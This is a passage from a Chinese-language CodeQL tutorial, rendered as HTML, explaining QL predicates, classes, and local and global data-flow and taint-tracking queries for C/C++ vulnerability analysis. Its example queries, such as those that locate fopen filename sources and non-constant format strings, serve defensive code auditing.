class="line">select <span class="built_in">getSuccessor</span>(<span class="number">33</span>) <span class="comment">// 不输出任何信息</span></span><br></pre></td></tr></table></figure><blockquote><p>谓词主体的语法只是为了表述逻辑之间的关系，因此务必不要用一般编程语言的语法来理解。</p></blockquote></li><li><p>在谓词主体中，<code>result</code>变量可以像一般变量一样正常使用，唯一不同的是这个变量内的数据将会被返回。</p><p>同时，<strong>谓词可能返回多个结果，或者根本不返回任何结果</strong>。以下是一个简单的例子。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">string <span class="title">getANeighbor</span><span class="params">(string country)</span> </span>&#123;</span><br><span class="line">    country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">    <span class="keyword">or</span></span><br><span class="line">    country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Germany&quot;</span></span><br><span class="line">    <span class="keyword">or</span></span><br><span class="line">    country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Austria&quot;</span></span><br><span class="line">    <span class="keyword">or</span></span><br><span class="line">    country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">select <span class="built_in">getANeighbor</span>(<span class="string">&quot;France&quot;</span>)</span><br><span class="line"><span class="comment">// 返回两个条目，&quot;Belgium&quot;与&quot;Germany&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>谓词不允许描述的数据集合个数<strong>不限于有限数量大小</strong>的。举个例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 该谓词将使得编译报错</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">multiplyBy4</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// i是一个数据集合，此时该集合可能是**无限大小**</span></span><br><span class="line">  <span class="comment">// result集合被设置为i*4，意味着result集合的大小有可能也是**无限大小**</span></span><br><span class="line">  result = i * <span class="number">4</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但如果我们仍然需要定义这类函数，则必须<strong>限制集合数据大小</strong>，同时添加一个<code>bindingset</code>标注。该标注将会声明谓词<code>plusOne</code>所包含的数据集合是有限的，前提是<code>i</code>绑定到有限数量的数据集合。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">bindingset[x] bindingset[y]</span><br><span class="line"><span class="function">predicate <span class="title">plusOne</span><span class="params">(<span class="type">int</span> x, <span class="type">int</span> y)</span> </span>&#123;</span><br><span class="line">  x + <span class="number">1</span> = y</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from <span class="type">int</span> x, <span class="type">int</span> y</span><br><span class="line">where y = <span class="number">42</span> <span class="keyword">and</span> <span class="built_in">plusOne</span>(x, y)</span><br><span class="line">select x, y</span><br></pre></td></tr></table></figure></li></ul><h4 id="d-递归">d. 递归</h4><ul><li><p>谓词类似于函数，可以<strong>递归调用</strong>。</p><p>同时<code>result</code>变量可以按照任何方式来表达与其他变量之间的关系，因此<code>result</code>变量的赋值不局限于使用<code>=</code>符号。</p><p>以下是一个简单例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">string <span class="title">getANeighbor</span><span class="params">(string country)</span> </span>&#123;</span><br><span class="line">  country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Germany&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Austria&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="built_in">getANeighbor</span>(result)</span><br><span class="line">&#125;</span><br><span class="line">select <span class="built_in">getANeighbor</span>(<span class="string">&quot;Austria&quot;</span>)</span><br><span class="line"><span class="comment">// 输出Germany</span></span><br></pre></td></tr></table></figure></li><li><p>传递闭包</p><blockquote><p>谓词的传递闭包是递归谓词，它的结果是通过重复应用原始的谓词来获得的。</p><p>特别要注意的是，原始谓词必须有两个参数(可能包括this或result值)，并且这些参数必须具有兼容的类型。</p><p>由于传递闭包是递归的一种常见形式，因此QL有两个有用的缩写，分别是<code>+</code>和<code>*</code></p></blockquote><ul><li><p><strong>传递闭包(+)</strong></p><p>如果要一次或多次的应用特定谓词，请在谓词后添加一个<code>+</code>符号。</p><p>举个例子，假设定义了一个带有成员谓词<code>getAParent()</code>的<code>Person</code>类，其中<code>p.getAParent()</code>会返回p的所有父母。而<code>p.getAParent+()</code>将会返回p的父母、p的父母的父母、等等等等。</p><p>使用<code>+</code>来表示通常会比显式定义递归谓词更简单，<code>p.getAParent+()</code>等价于以下递归谓词：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Person <span class="title">getAnAncestor</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  result = <span class="keyword">this</span>.<span class="built_in">getAParent</span>()</span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  result = <span class="keyword">this</span>.<span class="built_in">getAParent</span>().<span class="built_in">getAnAncestor</span>()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><strong>自反传递闭包(*)</strong></p><p>这个类似于上面的传递闭包。与之前所不同的是，使用<code>*</code>可以让谓词调用自己一次至多次。</p><p>例如：<code>p.getAParent*()</code>将会输出p的祖先，或者p。该谓词调用等价于以下谓词:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Person <span class="title">getAnAncestor2</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  result = <span class="keyword">this</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  result = <span class="keyword">this</span>.<span class="built_in">getAParent</span>().<span class="built_in">getAnAncestor2</span>()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul><blockquote><p>参考：<a href="https://help.semmle.com/QL/ql-handbook/predicates.html">Predicates - QL language reference</a></p></blockquote><h3 id="2-类">2. 类</h3><ul><li><p>以上面ql中的各种类为例（例如Function类），这些类的设计将特定一类的代码归结为一处，以便于后续查询的使用。而如果我们需要自定义特定的类，那该怎么做呢？</p><blockquote><p>CodeQL中的类，<strong>并不意味着建立一个新的对象</strong>，而只是表示特定一类的数据集合，请注意区分。</p></blockquote></li><li><p>定义一个类，需要三个步骤</p><ul><li><p>使用关键字<code>class</code></p></li><li><p>起一个类名，其中类名必须是首字母大写的。</p></li><li><p>确定是从哪个类中派生出来的</p><blockquote><p>使用的基类，除了cpp包中定义的各种类以外，还包括基本类型，即<code>boolean</code>、<code>float</code>、<code>int</code>、<code>string</code>以及<code>date</code>。</p></blockquote></li><li><p>类的主体</p></li></ul></li><li><p>以下是一个简单的例子，这个例子是官方的一个样例。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">OneTwoThree</span> extends <span class="type">int</span> &#123;</span><br><span class="line">  <span class="built_in">OneTwoThree</span>() &#123; <span class="comment">// characteristic predicate</span></span><br><span class="line">    <span class="keyword">this</span> = <span class="number">1</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">2</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">3</span></span><br><span class="line">  &#125;</span><br><span class="line"> </span><br><span class="line">  string <span class="built_in">getAString</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    result = <span class="string">&quot;One, two or three: &quot;</span> + <span class="keyword">this</span>.<span class="built_in">toString</span>()</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  predicate <span class="built_in">isEven</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    <span class="keyword">this</span> in [<span class="number">1</span> .. <span class="number">2</span>] <span class="comment">// </span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from OneTwoThree i </span><br><span class="line">where i = <span class="number">1</span> <span class="keyword">or</span> i.<span class="built_in">getAString</span>() = <span class="string">&quot;One, two or three: 2&quot;</span></span><br><span class="line">select i</span><br><span class="line"><span class="comment">// 输出1和2</span></span><br></pre></td></tr></table></figure><ul><li><p><strong>特征谓词</strong>类似于C++中的类构造函数，它将会进一步限制当前类所表示数据的集合。例如上面的特征谓词</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">OneTwoThree</span>() &#123; <span class="comment">// characteristic predicate</span></span><br><span class="line">  <span class="keyword">this</span> = <span class="number">1</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">2</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">3</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>它将数据集合从原先的<code>Int</code>集，进一步限制至1-3这个范围。</p><p><code>this</code>变量表示的是当前类中所包含的数据集合。与<code>result</code>变量类似，<code>this</code>同样是用于表示数据集合直接的关系。</p></li><li><p>在特征谓词中，比较常用的一个关键字是<a href="https://help.semmle.com/QL/ql-handbook/formulas.html#exists">exists</a>。该关键字的语法如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exists</span>(&lt;variable declarations&gt; | &lt;formula&gt;)</span><br><span class="line"><span class="comment">// 以下两个exists所表达的意思等价。</span></span><br><span class="line"><span class="built_in">exists</span>(&lt;variable declarations&gt; | &lt;formula <span class="number">1</span>&gt; | &lt;formula <span class="number">2</span>&gt;</span><br><span class="line"><span class="built_in">exists</span>(&lt;variable declarations&gt; | &lt;formula <span class="number">1</span>&gt; <span class="keyword">and</span> &lt;formula <span class="number">2</span>&gt;</span><br></pre></td></tr></table></figure><p>这个关键字的使用引入了一些新的变量。如果变量中至少有一组值可以使formula成立，那么该值将被保留。</p><p>一个简单的例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkByteSwap</span> extends Expr&#123;</span><br><span class="line">    <span class="built_in">NetworkByteSwap</span>()</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 对于MacroInvocation这个大类的数据集合来说，</span></span><br><span class="line">        <span class="built_in">exists</span>(MacroInvocation mi |</span><br><span class="line">            <span class="comment">// 如果存在宏调用，其宏名称满足特定正则表达式</span></span><br><span class="line">            mi.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>) <span class="keyword">and</span></span><br><span class="line">            <span class="comment">// 将这类数据保存至当前类中</span></span><br><span class="line">            <span class="keyword">this</span> = mi.<span class="built_in">getExpr</span>()</span><br><span class="line">          )</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from NetworkByteSwap n</span><br><span class="line">select n, <span class="string">&quot;Network byte swap&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>与之对应的还有成员谓词，如下例所示</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">OneTwoThree</span> extends <span class="type">int</span> &#123;</span><br><span class="line">  <span class="built_in">OneTwoThree</span>() &#123; <span class="comment">// characteristic predicate</span></span><br><span class="line">    <span class="keyword">this</span> = <span class="number">1</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">2</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">3</span></span><br><span class="line">  &#125;</span><br><span class="line"> </span><br><span class="line">  string <span class="built_in">getAString</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    result = <span class="string">&quot;One, two or three: &quot;</span> + <span class="keyword">this</span>.<span class="built_in">toString</span>()</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  predicate <span class="built_in">isEven</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    <span class="keyword">this</span> in [<span class="number">1</span> .. <span class="number">2</span>]</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">select <span class="number">1.</span>(OneTwoThree).<span class="built_in">getAString</span>() <span class="comment">// 输出&quot;One, two or three: 1&quot;</span></span><br><span class="line"><span class="comment">//select 4.(OneTwoThree).getAString() // 无输出</span></span><br></pre></td></tr></table></figure><p>其中，<code>1.(OneTwoThree).getAString()</code>会将<code>int</code>类型的1转换为<code>OneTwoThree</code>类型。<strong>在转换的过程中会丢弃不满足<code>OneTwoThree</code>类中限定条件的数据</strong>。因此<code>4.(OneTwoThree).getAString()</code>将不会输出任何信息，因为整数4在转换的过程中被丢弃了。</p></li></ul></li><li><p>与C++类似，CodeQL中类里可以声明一个类字段，如下例所示</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">SmallInt</span> extends <span class="type">int</span> &#123;</span><br><span class="line">  <span class="built_in">SmallInt</span>() &#123; <span class="keyword">this</span> = [<span class="number">1</span> .. <span class="number">10</span>] &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> DivisibleInt extends SmallInt &#123;</span><br><span class="line">  SmallInt divisor;   <span class="comment">// declaration of the field `divisor`</span></span><br><span class="line">  <span class="built_in">DivisibleInt</span>() &#123; <span class="keyword">this</span> % divisor = <span class="number">0</span> &#125;</span><br><span class="line"></span><br><span class="line">  SmallInt <span class="built_in">getADivisor</span>() &#123; result = divisor &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from DivisibleInt i</span><br><span class="line">select i, i.<span class="built_in">getADivisor</span>()</span><br></pre></td></tr></table></figure></li><li><p>需要注意的是，</p><ul><li><p>每个类都不能继承自己</p></li><li><p>不能继承final类</p></li><li><p>不能继承不相容的类</p><blockquote><p>这一点需要额外说明一下，从某个基类派生出的类，将拥有基类的所有数据集合范围。如果某个类继承了多个基类，那么<strong>该类内含的数据集合，将是两个基类数据集合的交集</strong>。</p></blockquote></li></ul></li></ul><blockquote><p>参考：<a href="https://help.semmle.com/QL/ql-handbook/types.html#classes">class - QL language reference</a></p></blockquote><h2 id="六、数据流分析与污点追踪">六、数据流分析与污点追踪</h2><blockquote><p>该部分内容主要 <s>参考</s> 翻译自：<a href="https://codeql.github.com/docs/codeql-language-guides/analyzing-data-flow-in-cpp/">Analyzing data flow in C and C++ - CodeQL documentation</a></p><p>参考了<a href="https://codeql.github.com/docs/writing-codeql-queries/about-data-flow-analysis/#about-data-flow-analysis">About data flow analysis</a>的部分内容</p></blockquote><ul><li>我们可以在CodeQL中，使用数据流分析来跟踪可能导致漏洞的潜在恶意数据流。</li><li>数据流分析可以分析出变量在程序中各节点上可能的值，并确定这些值如何在程序中传输以及使用方式。</li><li><strong>数据流</strong>分为两个部分：<strong>局部数据流</strong>以及<strong>全局数据流</strong></li></ul><h3 id="1-局部数据流">1. 局部数据流</h3><p><strong>局部数据流</strong>指的是在一个单独函数内的数据流。局部数据流比全局数据流分析的更加简单、迅速，同时也更加精确。</p><h4 id="a-使用局部数据流">a. 使用局部数据流</h4><ul><li><p>局部数据流的库函数主要位于<code>DataFlow</code>模块中。该模块定义了一个类<code>Class</code>，这个类用于表示数据可以流经的任何元素。</p></li><li><p>而<code>Node</code>类分为两种，分别是表达式节点<code>ExprNode</code>与参数节点<code>ParameterNode</code>。我们可以使用谓词<code>asExpr</code>与<code>asParameter</code>，将数据流结点与表达式节点/参数结点之间进行映射。</p><blockquote><p>注意：参数结点<code>ParameterNode</code>指的是<strong>当前函数参数</strong>的数据流结点。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Node</span> &#123;</span><br><span class="line">  <span class="comment">/** Gets the expression corresponding to this node, if any. */</span></span><br><span class="line">  <span class="function">Expr <span class="title">asExpr</span><span class="params">()</span> </span>&#123; ... &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/** Gets the parameter corresponding to this node, if any. */</span></span><br><span class="line">  <span class="function">Parameter <span class="title">asParameter</span><span class="params">()</span> </span>&#123; ... &#125;</span><br><span class="line"></span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>或者使用谓词<code>exprNode</code>以及<code>parameterNode</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Gets the node corresponding to expression `e`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">ExprNode <span class="title">exprNode</span><span class="params">(Expr e)</span> </span>&#123; ... &#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Gets the node corresponding to the value of parameter `p` at function entry.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">ParameterNode <span class="title">parameterNode</span><span class="params">(Parameter p)</span> </span>&#123; ... &#125;</span><br></pre></td></tr></table></figure></li><li><p>谓词<code>localFlowStep(Node nodeFrom, Node nodeTo)</code>可以分析出从<code>nodeFrom</code>到<code>nodeTo</code>中的元素之间数据流动的方式。该谓词可以通过使用符号<code>+</code>和<code>*</code>来进行递归调用，或者使用预定义好的递归谓词<code>localFlow</code>。</p><p>以下是一个用于查找从参数<code>source</code>到表达式<code>sink</code>的例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DataFlow::<span class="built_in">localFlow</span>(DataFlow::<span class="built_in">parameterNode</span>(source), DataFlow::<span class="built_in">exprNode</span>(sink))</span><br></pre></td></tr></table></figure></li></ul><h4 id="b-使用局部污点追踪">b. 使用局部污点追踪</h4><ul><li><p>局部污点追踪通过包括非保留值的流程步骤来扩展了局部数据流，例如以下C++代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> i = <span class="built_in">tainted_user_input</span>();</span><br><span class="line">some_big_struct *array = <span class="built_in">malloc</span>(i * <span class="built_in">sizeof</span>(some_big_struct));</span><br></pre></td></tr></table></figure><p>由于输出的变量<code>i</code>被污染，因此使用变量<code>i</code>的<code>malloc</code>函数参数也被污染。</p></li><li><p>局部污点追踪的库函数主要位于<code>TaintTracking</code>模块中。与局部数据流分析类似，污点追踪同样有谓词<code>localTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo)</code>用于污点分析，同样有递归版本的<code>localTaint</code>谓词。</p><p>一个简单的例子，查找从参数<code>source</code>到表达式<code>sink</code>的污点传播。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TaintTracking::<span class="built_in">localTaint</span>(DataFlow::<span class="built_in">parameterNode</span>(source), DataFlow::<span class="built_in">exprNode</span>(sink))</span><br></pre></td></tr></table></figure></li></ul><h4 id="c-例子">c. 例子</h4><ul><li><p>这个例子是用于查找传入<code>fopen</code>函数的文件名称</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function fopen, FunctionCall fc</span><br><span class="line">where fopen.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">  <span class="keyword">and</span> fc.<span class="built_in">getTarget</span>() = fopen</span><br><span class="line">select fc.<span class="built_in">getArgument</span>(<span class="number">0</span>)</span><br></pre></td></tr></table></figure><p>但上面的ql代码只会将<strong>文件名参数</strong>的表达式输出，而这并不是可能传递给它的值。因此我们需要使用局部数据流分析来找到所有可流入该参数的表达式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line">from Function fopen, FunctionCall fc, Expr src</span><br><span class="line">where fopen.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">  <span class="keyword">and</span> fc.<span class="built_in">getTarget</span>() = fopen</span><br><span class="line">  <span class="keyword">and</span> DataFlow::<span class="built_in">localFlow</span>(DataFlow::<span class="built_in">exprNode</span>(src), DataFlow::<span class="built_in">exprNode</span>(fc.<span class="built_in">getArgument</span>(<span class="number">0</span>)))</span><br><span class="line">select src</span><br></pre></td></tr></table></figure><p>这样它将会输出可能流入<code>fopen</code>文件名参数的<strong>所有变量的表达式</strong>。</p><p>现在我们可以稍微将<code>source</code>改一下，将<code>exprNode</code>改成<code>parameterNode</code>，这样就可以查询出<strong>既是当前函数的参数，又可以作为<code>fopen</code>的文件名参数</strong>的表达式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line">from Function fopen, FunctionCall fc, Parameter p</span><br><span class="line">where fopen.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">  <span class="keyword">and</span> fc.<span class="built_in">getTarget</span>() = fopen</span><br><span class="line">  <span class="keyword">and</span> DataFlow::<span class="built_in">localFlow</span>(DataFlow::<span class="built_in">parameterNode</span>(p), DataFlow::<span class="built_in">exprNode</span>(fc.<span class="built_in">getArgument</span>(<span class="number">0</span>)))</span><br><span class="line">select p</span><br></pre></td></tr></table></figure></li><li><p>以下这个例子将会查找<strong>格式字符串中没有被硬编码</strong>的格式化函数的调用。</p><blockquote><p>格式化函数包括但不限于各种<code>printf</code>函数。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.commons.Printf</span><br><span class="line"></span><br><span class="line">from FormattingFunction format, FunctionCall call, Expr formatString</span><br><span class="line">where call.<span class="built_in">getTarget</span>() = format</span><br><span class="line">  <span class="keyword">and</span> call.<span class="built_in">getArgument</span>(format.<span class="built_in">getFormatParameterIndex</span>()) = formatString</span><br><span class="line">  <span class="keyword">and</span> <span class="keyword">not</span> <span class="built_in">exists</span>(DataFlow::Node source, DataFlow::Node sink |</span><br><span class="line">    DataFlow::<span class="built_in">localFlow</span>(source, sink) <span class="keyword">and</span></span><br><span class="line">    source.<span class="built_in">asExpr</span>() instanceof StringLiteral <span class="keyword">and</span></span><br><span class="line">    sink.<span class="built_in">asExpr</span>() = formatString</span><br><span class="line">  )</span><br><span class="line">select call, <span class="string">&quot;Argument to &quot;</span> + format.<span class="built_in">getQualifiedName</span>() + <span class="string">&quot; isn&#x27;t hard-coded.&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h3 id="2-全局数据流">2. 全局数据流</h3><p>全局数据流跟踪整个程序的数据流，因此比局部数据流更强大。但全局数据流的准确性不如本地数据流，并且通常需要更多的时间和内存来执行分析。</p><h4 id="a-使用全局数据流">a. 使用全局数据流</h4><p>通过继承<code>DataFlow::Configuration</code>类来使用全局数据流库。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">MyDataFlowConfiguration</span> extends DataFlow::Configuration &#123;</span><br><span class="line">  <span class="built_in">MyDataFlowConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;MyDataFlowConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在<code>DataFlow::Configuration</code>类中定义了如下几个谓词：</p><ul><li><code>isSource</code>： <strong>定义数据可能从何处流出</strong></li><li><code>isSink</code>： <strong>定义数据可能流向的位置</strong></li><li><code>isBarrier</code>： 可选，限制数据流</li><li><code>isBarrierGuard</code>： 可选，限制数据流</li><li><code>isAdditionalFlowStep</code>： 可选，添加其他流程步骤</li></ul><p>在特征谓词<code>MyDataFlowConfiguration()</code>中定义了当前<code>Configuration</code>的名称，因此内部的<code>&quot;MyDataFlowConfiguration&quot;</code>需要替换成自己的名称。</p><p>使用谓词<code>hasFlow(DataFlow::Node source, DataFlow::Node sink)</code>来执行全局数据流分析</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">from MyDataFlowConfiguration dataflow, DataFlow::Node source, DataFlow::Node sink</span><br><span class="line">where dataflow.<span class="built_in">hasFlow</span>(source, sink)</span><br><span class="line">select source, <span class="string">&quot;Data flow to $@.&quot;</span>, sink, 